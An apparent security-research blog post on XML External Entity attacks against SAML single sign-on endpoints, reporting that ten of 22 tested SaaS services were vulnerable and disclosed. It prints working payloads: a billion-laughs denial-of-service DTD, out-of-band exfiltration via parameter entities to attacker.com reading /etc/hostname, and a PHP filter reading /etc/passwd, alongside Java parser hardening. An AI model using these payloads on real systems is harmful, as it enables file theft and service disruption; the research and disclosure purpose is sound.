Detecting and exploiting XXE in SAML Interfaces
This post will describe some findings, problems and inisghts regarding XML External Entity Attacks (XXEA) that we gathered during a large-scale security analysis of several SAML interfaces.
XXEA has been a popular attack class in the last months, see for example
First, we introduce the concept of Document Type Definition (DTD) and XML External Entity (XXE), and afterwards some basics on SAML. If you are fimiliar with these concepts, you may want to skip these sections and go to the last section XXEA on SAML.
XML offers the possibility to describe the document’s structure
by using a Document Type Definition (DTD).
This is well known from classical HTML documents:
This declaration defines the HTML doctype that is identified by "-//W3C//DTD HTML 4.01 Transitional//EN". The exact definition is publicy available and the URL contains its declaration:
It now depends on the document parser whether this URL is resolved or not. There are good reasons not to curl the DTD every time, for instance, to save time. Additionally, it is not needed for HTML because this DTD is well known and most probably hard-coded in any browser.
Technically, the XML/HTML parser that processes the given document resolves each ENTITY, for instance, it replaces &msg; by the String 'Hello World'.
Entity resolving is not problematic per se, but it can lead to efficient Denial-of-Service (DoS) Attacks if used like this:
By parsing this message, the entity &z; is recursively resolved, which leads to high memory consumption.This attack is also known as the Billion laughs attack.
Instead of defining a simple string for the Entity msg in this example,it is possible to let the document parser load the content of a specified file, for instance, the '/etc/hostname' file.
There are several ways to do this:
This is, for instance, the case for the default Java XML parser. To mitigate XXEA, one has to configure the parser as follows:
In conjunction with Single Sign-On (SSO) systems, SAML especially offers a standardized format for authentication tokens.
The good thing first:
For understanding how XXEA can be used in SAML, it is not necessary to understand how SAML exactly works.
All we need to know is:
This means, that in contrast to the first given XXEA example, we are only able to read the content of a system resource using XXE, but we cannot simply send this content somewhere else so that it becomes accessible to the attacker.
The Figure above illustrates the problem. The only thing that is sent back to the user (attacker) is whether the login was successful or not. During our study, only few applications responded with a specific error message, but in no case this message reflected any content from the SAML-Assertion.
Thus, we had to find another way to retrieve the content of system resources.
A requirement for an XXEA is:
If we do not receive a GET request, we will try the same idea but with PUBLIC instead of SYSTEM, because some parsers might disable SYSTEM processing while PUBLIC is still allowed.
The basic Idea looks as follows:
This is due to the fact, that External Entities must not be included in other External Entities. This means, that most parsers will abort the DTD processing on finding the file Entity within the send Entity declaration.
Nevertheless, another DTD feature called Parameter Entities exists that allows to bypass this restriction. The idea is described in a Whitepaper on DTD and XXE Attacks by Morgan et. al.
The Parameter Entities look similar to common Entities but start with a percentage character (%). They can be seen as a Meta Language for DTD (comparable to #DEFINE instructions in C/C++).
The Web Application processes the DTD as follows:
Once we changed our Server port to 80 (default HTTP), the detection phase was successful.
However, this file might include whitespaces, linefeeds and special characters.
Depending on the target Web Application and its XML parser, the file can cause problems. For example, within the GET request, they can break the parsing process, or characters like '<' can produce invalid XML, so that it is not parseable.
Thus, we prefer to use the file '/etc/hostname' for testing purposes.
In PHP, there is a nice possibility to read arbitrary files by encoding it directly with Base64:
We sent several XXEA messages to them and tried to read the '/etc/hostname' file. It failed in some cases, but in other tries it was successful.
This is due to the fact, that the Web Application was behind a load balancer that deligates the requests to different servers.
On some of them, the '/etc/hostname' file exists, on other, it doesn't. This is, for example, the case for CentOS Servers.
We looked at the User-Agent of the Web Application that sends the request to attacker.com and found out that they differ randomly, for instance, User-Agent: Java/1.6.0_45 and User-Agent: Java/1.7.0_55. This indicates that different Servers process the requests.
Ten out of them were vulnerable to XXEA and we have reported our results to them.
The full paper can be found here:
http://nds.rub.de/research/publications/saml-saas/
Christian Mainka (@CheariX)
XXEA has been a popular attack class in the last months, see for example
- How we got read access on Google’s production servers
- XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers
First, we introduce the concept of Document Type Definition (DTD) and XML External Entity (XXE), and afterwards some basics on SAML. If you are fimiliar with these concepts, you may want to skip these sections and go to the last section XXEA on SAML.
Document Type Definition (DTD) and XML External Entity (XXE)
Understanding DTD
XML offers the possibility to describe the document’s structure
by using a Document Type Definition (DTD).
This is well known from classical HTML documents:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">Many people think that the declaration above just indicates that the content within the document contains HTML 4.01 data, but technically, there is more.
<html>
...
This declaration defines the HTML doctype that is identified by "-//W3C//DTD HTML 4.01 Transitional//EN". The exact definition is publicy available and the URL contains its declaration:
% curl -D- http://www.w3.org/TR/html4/loose.dtd
HTTP/1.1 200 OK
...
Content-Type: text/plain
<!ENTITY % HTML.Version "-//W3C//DTD HTML 4.01 Transitional//EN"...
<!ENTITY % HTML.Frameset "IGNORE">
<!ENTITY % ContentType "CDATA"
It now depends on the document parser whether this URL is resolved or not. There are good reasons not to curl the DTD every time, for instance, to save time. Additionally, it is not needed for HTML because this DTD is well known and most probably hard-coded in any browser.
Understanding XML Entity
However, the concept of DTD is generic and offers more features, for example, a DTD allows to define an ENTITY:<!DOCTYPE Response [
<!ENTITY msg 'Hello World'>
]>
<Response>&msg;</Response>In this case, the Entity msg is defined as the String 'Hello World'. This concept is also very wide-spread in HTML, for example, < (<) or & (&) can be used to encode specific characters (these are default HTML Entities that are defined by the DTD).
Technically, the XML/HTML parser that processes the given document resolves each ENTITY, for instance, it replaces &msg; by the String 'Hello World'.
Entity resolving is not problematic per se, but it can lead to efficient Denial-of-Service (DoS) Attacks if used like this:
<!DOCTYPE Response [
<!ENTITY a 'aaaaaa'>
<!ENTITY b '&a;&a;&a;&a;&a;'>
<!ENTITY c '&b;&b;&b;&b;&b;'>
...
<!ENTITY z '&y;&y;&y;&y;&y;'>
]>
<Response>&z;</Response>
By parsing this message, the entity &z; is recursively resolved, which leads to high memory consumption.This attack is also known as the Billion laughs attack.
Understanding XML External Entity
In addition to XML Entities, DTDs offer the ability to define External Entities. The concept is similar to the HTML definition above:<!DOCTYPE Message [
<!ENTITY msg SYSTEM '/etc/hostname'>
]>
<Message>&msg;</Message>
Instead of defining a simple string for the Entity msg in this example,it is possible to let the document parser load the content of a specified file, for instance, the '/etc/hostname' file.
There are several ways to do this:
<!ENTITY msg SYSTEM '/etc/hostname'>The examples above differ mainly in two aspects:
<!ENTITY msg SYSTEM 'file:///etc/hostname'>
<!ENTITY msg SYSTEM 'http:///myserver.com/something'><!ENTITY msg PUBLIC 'm' '/etc/hostname'><!ENTITY msg PUBLIC 'm' 'file:///etc/hostname'>
<!ENTITY msg PUBLIC 'm' 'http:///myserver.com/something'>
- SYSTEM vs PUBLIC: As indicated by the name, the SYSTEM Entities are intended to be for files locally stored on the machine, whereas PUBLIC are for contents accessible from the internet, for example, the HTML definition as mentioned earlier. PUBLIC Entities need an identifier (here: 'm') but the value of the identifier does not matter.
- The protocol. Depending on the parser (the programming language), it is possible to use the absolute path of a file, or to use the file:// protocol. Most parsers additionally understand the http:// and https:// handler and, for instance, Java also allows to use jar:// protocol (which basically allows to unzip files).
XML External Entity Attack (XXEA)
An XML External Entity Attack works as follows:- The attacker prepares an XML message together with a DTD as shown above. This message commonly includes an XXE that reads a locally stored file, for example '/etc/hostname'.
- The attacker sends the prepared XML message to the Web Application.
- The Web Application processes the incoming XML message.
It parses the DTD, resolves the XXE, and then deals with the resultung XML. - The Web Application send an HTTP response to the attacker.
For a successful XXEA, this response must somehow contain the content of the locally stored file, for example the '/etc/hostname' file.
On a very basic level, this can be compared to reflective XSS.
Preventing XXEA
Given the number of possibilities to mount an XXEA, its prevention is not that easy. It is additionally alarming that most XML parser has enabled DTD processing (and therefore process XXE in most cases) by default.This is, for instance, the case for the default Java XML parser. To mitigate XXEA, one has to configure the parser as follows:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// not important to prevent XXEA
dbf.setNamespaceAware(true);
// validate document while parsing it
dbf.setValidating(true);
// do not expand entity reference nodes
dbf.setExpandEntityReferences(false);
// validate document against DTD
dbf.setFeature("http://xml.org/sax/features/validation", true);
// do not include external general entities
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
// do not include external parameter entities or the external DTD subset
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
// build the grammar but do not use the default attributes and attribute types information it contains
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-dtd-grammar", false);
// ignore the external DTD completely
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
Security Assertion Markup Language (SAML)
The most important industry standard for Identity Management is the SecurityAssertion Markup Language (SAML) . SAML is based on the eXtensible Markup Language (XML) and enables the secure exchange of XML-based authentication messages.In conjunction with Single Sign-On (SSO) systems, SAML especially offers a standardized format for authentication tokens.
The good thing first:
For understanding how XXEA can be used in SAML, it is not necessary to understand how SAML exactly works.
All we need to know is:
- SAML Assertions are XML. This fact allows us to include a DTD.
- The XML message is transmitted to the server as an URL-Encoded plus Base64-Encoded String.
This means, that in contrast to the first given XXEA example, we are only able to read the content of a system resource using XXE, but we cannot simply send this content somewhere else so that it becomes accessible to the attacker.
Thus, we had to find another way to retrieve the content of system resources.
XXEA on SAML
Detection Phase
Before we executed the XXEA, we started with the detection phase.A requirement for an XXEA is:
- The server processes DTD.
- XXE is allowed and processed within the DTD.
<!DOCTYPE Message [We setup a Web Server reachable at the domain "http://attacker.com". If the targeted Web Application processes the DTD correctly, our Web Server receives a GET request and XXEA might be possible.
<!ENTITY send SYSTEM "http://attacker.com/working">
]>
<Message>&send;</Message>
If we do not receive a GET request, we will try the same idea but with PUBLIC instead of SYSTEM, because some parsers might disable SYSTEM processing while PUBLIC is still allowed.
Exploit Phase
Since Web Applications using SAML do not reflect content from the SAML-Assertion, we wanted to send the content of the system resource as a GET parameter to our own server (http://attacker.com).The basic Idea looks as follows:
<!DOCTYPE Message [The code above does not work directly.
<!ENTITY file SYSTEM "/etc/hostname">
<!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
]>
<Message>&send;</Message>
This is due to the fact, that External Entities must not be included in other External Entities. This means, that most parsers will abort the DTD processing on finding the file Entity within the send Entity declaration.
Nevertheless, another DTD feature called Parameter Entities exists that allows to bypass this restriction. The idea is described in a Whitepaper on DTD and XXE Attacks by Morgan et. al.
<!DOCTYPE Message [The above content is then Base64 plus URL-encoded and sent to the SAML-Endpoint URL of the Web Application. Please note, that the Entity send within the <Message> Element is not directly defined in the DTD. It will be defined in the DTD that is loaded from 'http://attacker.com/mydtd' later on.
<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % dtd SYSTEM 'http://attacker.com/mydtd'>
%dtd;]>
<Message>&send;</Message>
The Parameter Entities look similar to common Entities but start with a percentage character (%). They can be seen as a Meta Language for DTD (comparable to #DEFINE instructions in C/C++).
The Web Application processes the DTD as follows:
- The parser processes the first Parameter Entity % file, thus reading the content of the /etc/hostname system resource.
- It then processes the second Parameter Entity % dtd.
This one enforces the parser to load an External DTD that is provided by the attacker's HTTP server.
Server responds with:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/send/%file;'>">
%all; - This file is immediately parsed and processed.
It defines a Parameter Entity % all that declares an Entity send.
The send Entity is an External Entity pointing again to the attacker's server. The URL Request contains the content of the file Parameter Entity.
The last line contains only "%all;". This means, that at this place, the content of the %all Entity will be placed. This is the declaration of the send Entity. - The last line of the attacker's request contains "%dtd;" - this means, that at this place, the content of the the File
'http://attacker.com/mydtd' will be placed.
This is (again) the declaration of the send Entity. - Once the Web Application processes the line "<Response>&send;</Response>", the GET Request 'http://attacker.com/send/%file;' is executed and the attacker receives the content of the
'/etc/hostname' file.
Problems with this approach and their solutions
During our study, we found some interesting problems.Firewall
Most Web Application are behind a firewall. At the beginning of our evaluation, we used a Web Server that was reachable on http://attacker.com:9090. The problem with this approach was, that some Web Applications were not allowed to send GET request to Port 9090 due to firewall policies.Once we changed our Server port to 80 (default HTTP), the detection phase was successful.
Special Characters and Linefeed
For the exploit phase, the attacker has to chose which file he wants to read. We tried different ones. Most popular is reading the '/etc/passwd' file.However, this file might include whitespaces, linefeeds and special characters.
Depending on the target Web Application and its XML parser, the file can cause problems. For example, within the GET request, they can break the parsing process, or characters like '<' can produce invalid XML, so that it is not parseable.
Thus, we prefer to use the file '/etc/hostname' for testing purposes.
In PHP, there is a nice possibility to read arbitrary files by encoding it directly with Base64:
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
Load Balancers
We could detect a strange behavior on some Web Applications.We sent several XXEA messages to them and tried to read the '/etc/hostname' file. It failed in some cases, but in other tries it was successful.
This is due to the fact, that the Web Application was behind a load balancer that deligates the requests to different servers.
On some of them, the '/etc/hostname' file exists, on other, it doesn't. This is, for example, the case for CentOS Servers.
We looked at the User-Agent of the Web Application that sends the request to attacker.com and found out that they differ randomly, for instance, User-Agent: Java/1.6.0_45 and User-Agent: Java/1.7.0_55. This indicates that different Servers process the requests.
Evaluation Results
During our study, we have evaluated 22 Software-as-a-Service Web Applications that support Single Sign-On via SAML.Ten out of them were vulnerable to XXEA and we have reported our results to them.
Conclusion
Our study showed, that XXEA is a real threat to SAML Applications. The biggest problem is, that DTD processing, which is a must requirement for XXEA, is enabled by default in most XML parsers, but developers seem not to be aware of that feature.The full paper can be found here:
http://nds.rub.de/research/publications/saml-saas/
Authors of this Post
Vladislav MladenovChristian Mainka (@CheariX)
0 Response to "Detecting and exploiting XXE in SAML Interfaces"
Post a Comment